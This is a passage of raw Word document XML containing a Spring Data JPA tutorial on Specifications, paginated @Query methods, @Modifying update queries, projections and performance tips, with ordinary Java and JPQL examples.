          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Specification API</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which uses the Criteria API to build complex queries dynamically. It is a better way to handle complex conditions and reusable query logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2340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Specification</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows combining multiple predicates (conditions) into a single query and is useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a clean and reusable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2262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06ADFEC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mport org.springframework.data.jpa.domain.Specification;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C131D7C" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645F030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class EmployeeSpecifications {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04DDDE" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C066D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ublic static Specification&lt;Employee&gt; hasDepartment(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35193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root, query, builder) -&gt; builder.equal(root.get("department"), department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59165E0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4A211737" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7284846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ublic static Specification&lt;Employee&gt; hasSalaryGreaterThan(Double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9359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root, query, builder) -&gt; builder.greaterThan(root.get("salary"), salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8F22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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E093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5FD4A7B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Repository using Specifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3434A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JpaSpecificationExecutor&lt;Employee&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D41A6B" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5906668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598BD1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Using Specifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9ABF9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List&lt;Employee&gt; findEmployees(String department, Double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB60D4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ification&lt;Employee&gt; spec = Specification.where(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09293B50" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD5149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department != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428415B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 = spec.and(EmployeeSpecifications.hasDepartment(department));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040CE3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3132EBB1" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0988C07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f (salary != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D576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pec = spec.and(EmployeeSpecifications.hasSalaryGreaterThan(salary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581FA62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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136BAF4" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAEFBB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return employeeRepository.findAll(spec);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC0DA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5AA4758A"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JpaSpecificationExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows combining multiple specifications dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E1FF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It’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reusable</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, clean, and efficient for complex, dynamic queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D826D"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B8E389">
          <v:rect id="_x0000_i2878" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="226169E3"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5. Using @Query with Pageable for Complex Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E27FE9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If your query involves more complex filtering or joins, and you need pagination, you can combine custom queries with Spring Data’s pagination support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E812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578DAC0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10C7F59" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077E632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SELECT e FROM Employee e WHERE e.department = :department AND e.salary &gt; :salary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ADD51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ge&lt;Employee&gt; findEmployeesByDepartmentAndSalaryPaged(@Param("department") String department, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5712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ram("salary") Double salary, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861F6A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Pageable pageable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31401B3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0360EFD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Here, Pageable provides paging and sorting support for custom queries. You can pass it to the repository method and get paginated results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCC871"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FDFA53">
          <v:rect id="_x0000_i2879" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="090274A4"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6. Using @Modifying for Update/Delete Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41660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For queries that modify or delete data (i.e., </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-select queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), use the @Modifying annotation. This is important when performing complex update or delete operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF4326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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F3A3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30A84570" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427CB92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Modifying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7AA0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Query("UPDATE Employee e SET e.salary = :salary WHERE e.department = :department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA232A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int updateSalaryByDepartment(@Param("salary") Double salary, @Param("department") String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EB47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61DD49A9"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he @Modifying annotation is required for non-select queries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE</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INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FC6D8"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93038">
          <v:rect id="_x0000_i2880" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="525BF5E7"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7. Optimizing Query Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF589E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hen working with complex queries, performance can be a concern. Here are a few tips to optimize the performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8C9F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Indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the relevant columns (used in joins, WHERE clauses, etc.) are indexed in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A1C5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Query Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For frequently executed queries with relatively static data, consider using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cache mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EHCache</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Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F2F17"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lastRenderedPageBreak/>
        <w:t>Fetch Strategie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lazy loading</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eager loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> appropriately. For example, use @OneToMany(fetch = FetchType.LAZY) to avoid unnecessary data loading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E899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DTOs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Data Transfer Objects) and </w:t>
      </w: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to fetch only the required fields instead of loading entire entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1C9B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Example of projection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564331E"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Projection {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009E43B"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tring getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76859F9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String getDepartment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4792B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77D40E88" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3E5D16"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ublic interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85DB3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    List&lt;EmployeeProjection&gt; findBySalaryGreaterThan(Double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363714EF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AF3C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Projections help reduce the amount of data fetched from the database, making the query more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD638A2"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3BCE1A">
          <v:rect id="_x0000_i2881" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21479311"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8. Using Batch Processing for Large Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1C273"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For operations that involve large amounts of data (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bulk updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deletes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle them efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED965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Spring Data JPA supports batch processing, but you may need to configure your persistence.xml or application settings to enable batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AE266F" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00000000" w:rsidP="00C62B8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E9BBA">
          <v:rect id="_x0000_i2882" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31053017" w14:textId="77777777" w:rsidR="00C62B87" w:rsidRPr="00C62B87" w:rsidRDefault="00C62B87" w:rsidP="00C62B87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12ABF0"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To handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex queries efficiently</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Spring Data JPA, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5AD7E5"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Custom JPQL</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Native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries via @Query annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1977DD"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Criteria API</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamic and type-safe queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17FC94"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Specifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reusable query logic and complex dynamic conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49418272"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 xml:space="preserve">Pagination with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pageable</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for complex queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71363098"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Modifying</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for update and delete operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3279C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62B87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indexing</w:t>
